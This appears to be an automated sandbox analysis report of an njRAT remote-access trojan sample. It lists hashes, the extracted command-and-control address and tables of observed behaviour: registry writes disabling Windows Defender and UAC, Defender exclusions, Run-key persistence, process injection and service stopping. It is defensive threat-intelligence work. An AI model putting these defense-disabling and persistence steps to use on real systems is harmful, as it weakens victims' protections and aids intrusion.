njrat | 2aaf93a1bc4f18d8f7eff1bcd204f0b1ec348e6f2d438a8f80b4934338903ee4

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12-12-2024 17:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Size

337KB
MD5

e76822be6e7bf60c617c8d49133f444d
SHA1

5f45037213112c91ad51efda01930adf9748f56f
SHA256

2aaf93a1bc4f18d8f7eff1bcd204f0b1ec348e6f2d438a8f80b4934338903ee4
SHA512

224e9ddb781230ef3838a78489f195b0323dab8ce8ad20819eb6b87f4a5f8b4129a6abce44fefe367db41466cc5d2af9f07fb106a548312d2dc8fd3a2c0af865
SSDEEP

6144:hcpAt1E0QEkNM/HEgk0U0PCgSbZ//r5qwlgN:hcpAE0QEkNWkXgQ

Score

10^/10

njrat hacked defense_evasion discovery evasion execution persistence privilege_escalation trojan

Malware Config

Extracted

Family

njrat

Version

v4.0

Botnet

HacKed

152.228.248.235:5552

Mutex

Windows

Attributes

reg_key
Windows
splitter
|-F-|

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe

Njrat family
njrat
Turns off Windows Defender SpyNet reporting 2 TTPs
evasion

Disable or Modify Tools
T1562.001

Modify Registry
T1112

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Payload.exe

Windows security bypass 2 TTPs 3 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe = "0"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Payload.exe = "0"	Payload.exe

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Detected Nirsoft tools 1 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/files/0x0008000000023c9f-14.dat	Nirsoft

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3780	powershell.exe
4084	powershell.exe
804	powershell.exe
1792	powershell.exe
3416	powershell.exe
1396	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	AdvancedRun.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe

Executes dropped EXE 7 IoCs

pid	Process
3516	AdvancedRun.exe
1780	AdvancedRun.exe
1636	94afe960-b036-4a52-9186-d75814ab07bc.exe
2916	AdvancedRun.exe
4388	Payload.exe
3312	AdvancedRun.exe
768	Payload.exe

Windows security modification 2 TTPs 11 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe = "0"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Payload.exe = "0"	Payload.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows2 = "\\Windows.URL"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows = "\\Windows.URL"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Payload.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Payload.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe.log	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payload.exe.log	Payload.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4140 set thread context of 2720	4140	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe	133

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Payload.exe	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
File opened for modification	C:\Windows\Payload.exe	attrib.exe

Launches sc.exe 44 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4396	sc.exe
1068	sc.exe
1736	sc.exe
3248	sc.exe
4100	sc.exe
1604	sc.exe
4120	sc.exe
1704	sc.exe
1060	sc.exe
4308	sc.exe
4164	sc.exe
4052	sc.exe
4628	sc.exe
4552	sc.exe
8	sc.exe
4924	sc.exe
1064	sc.exe
4712	sc.exe
1584	sc.exe
2524	sc.exe
4020	sc.exe
8	sc.exe
4580	sc.exe
4900	sc.exe
4128	sc.exe
2372	sc.exe
4436	sc.exe
4372	sc.exe
4888	sc.exe
1724	sc.exe
756	sc.exe
4712	sc.exe
3436	sc.exe
4156	sc.exe
3836	sc.exe
2372	sc.exe
4744	sc.exe
3856	sc.exe
2428	sc.exe
64	sc.exe
4900	sc.exe
3708	sc.exe
1684	sc.exe
4024	sc.exe

Access Token Manipulation: Create Process with Token 1 TTPs 4 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
3516	AdvancedRun.exe
1636	94afe960-b036-4a52-9186-d75814ab07bc.exe
2916	AdvancedRun.exe
3312	AdvancedRun.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AdvancedRun.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AdvancedRun.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AdvancedRun.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	94afe960-b036-4a52-9186-d75814ab07bc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Payload.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AdvancedRun.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\di = "!"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	Payload.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
3516	AdvancedRun.exe
3516	AdvancedRun.exe
3516	AdvancedRun.exe
3516	AdvancedRun.exe
1780	AdvancedRun.exe
1780	AdvancedRun.exe
1780	AdvancedRun.exe
1780	AdvancedRun.exe
1636	94afe960-b036-4a52-9186-d75814ab07bc.exe
1636	94afe960-b036-4a52-9186-d75814ab07bc.exe
1636	94afe960-b036-4a52-9186-d75814ab07bc.exe
1636	94afe960-b036-4a52-9186-d75814ab07bc.exe
1792	powershell.exe
804	powershell.exe
804	powershell.exe
1792	powershell.exe
2916	AdvancedRun.exe
2916	AdvancedRun.exe
2916	AdvancedRun.exe
2916	AdvancedRun.exe
3416	powershell.exe
1396	powershell.exe
3416	powershell.exe
1396	powershell.exe
3312	AdvancedRun.exe
3312	AdvancedRun.exe
3312	AdvancedRun.exe
3312	AdvancedRun.exe
4388	Payload.exe
4388	Payload.exe
4084	powershell.exe
3780	powershell.exe
3780	powershell.exe
4084	powershell.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	3516	AdvancedRun.exe
Token: SeImpersonatePrivilege	3516	AdvancedRun.exe
Token: SeDebugPrivilege	1780	AdvancedRun.exe
Token: SeImpersonatePrivilege	1780	AdvancedRun.exe
Token: SeDebugPrivilege	1636	94afe960-b036-4a52-9186-d75814ab07bc.exe
Token: SeImpersonatePrivilege	1636	94afe960-b036-4a52-9186-d75814ab07bc.exe
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeDebugPrivilege	804	powershell.exe
Token: SeDebugPrivilege	2916	AdvancedRun.exe
Token: SeImpersonatePrivilege	2916	AdvancedRun.exe
Token: SeDebugPrivilege	4140	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: SeDebugPrivilege	3416	powershell.exe
Token: SeDebugPrivilege	1396	powershell.exe
Token: SeDebugPrivilege	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: 33	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: SeIncBasePriorityPrivilege	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: SeDebugPrivilege	3312	AdvancedRun.exe
Token: SeImpersonatePrivilege	3312	AdvancedRun.exe
Token: SeDebugPrivilege	4388	Payload.exe
Token: SeDebugPrivilege	4084	powershell.exe
Token: SeDebugPrivilege	3780	powershell.exe
Token: 33	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: SeIncBasePriorityPrivilege	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: 33	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: SeIncBasePriorityPrivilege	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: 33	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: SeIncBasePriorityPrivilege	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: 33	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: SeIncBasePriorityPrivilege	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: 33	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: SeIncBasePriorityPrivilege	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: 33	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: SeIncBasePriorityPrivilege	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: 33	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: SeIncBasePriorityPrivilege	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: 33	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: SeIncBasePriorityPrivilege	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: 33	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: SeIncBasePriorityPrivilege	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: 33	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: SeIncBasePriorityPrivilege	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: 33	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: SeIncBasePriorityPrivilege	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: 33	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: SeIncBasePriorityPrivilege	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: 33	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: SeIncBasePriorityPrivilege	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: 33	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Token: SeIncBasePriorityPrivilege	2720	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2308 wrote to memory of 3516	2308	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe	85
PID 2308 wrote to memory of 3516	2308	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe	85
PID 2308 wrote to memory of 3516	2308	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe	85
PID 3516 wrote to memory of 1780	3516	AdvancedRun.exe	86
PID 3516 wrote to memory of 1780	3516	AdvancedRun.exe	86
PID 3516 wrote to memory of 1780	3516	AdvancedRun.exe	86
PID 2308 wrote to memory of 804	2308	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe	94
PID 2308 wrote to memory of 804	2308	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe	94
PID 2308 wrote to memory of 804	2308	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe	94
PID 2308 wrote to memory of 1792	2308	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe	96
PID 2308 wrote to memory of 1792	2308	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe	96
PID 2308 wrote to memory of 1792	2308	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe	96
PID 2308 wrote to memory of 1636	2308	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe	98
PID 2308 wrote to memory of 1636	2308	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe	98
PID 2308 wrote to memory of 1636	2308	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe	98
PID 4140 wrote to memory of 2916	4140	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe	104
PID 4140 wrote to memory of 2916	4140	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe	104
PID 4140 wrote to memory of 2916	4140	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe	104
PID 3780 wrote to memory of 4372	3780	cmd.exe	107
PID 3780 wrote to memory of 4372	3780	cmd.exe	107
PID 3780 wrote to memory of 4396	3780	cmd.exe	108
PID 3780 wrote to memory of 4396	3780	cmd.exe	108
PID 3780 wrote to memory of 4924	3780	cmd.exe	109
PID 3780 wrote to memory of 4924	3780	cmd.exe	109
PID 3780 wrote to memory of 1068	3780	cmd.exe	110
